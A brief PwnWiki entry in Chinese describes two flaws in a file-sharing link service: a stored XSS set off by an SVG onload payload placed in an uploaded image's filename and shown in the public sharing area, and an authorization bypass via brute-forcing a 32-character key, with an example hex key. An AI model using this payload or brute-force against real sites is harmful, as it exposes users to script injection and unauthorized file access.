樹洞外鏈XSS&越權漏洞

From PwnWiki

XSS

><svg/onload=alert(6)>

上傳一張圖片,在創建文件名添加xss,公開是分享文件廣場。

越權漏洞

條件,可以爆破。32位隨機字符 需要key值。

c74bffaa1cd2a4eda30bd72fe5453bb0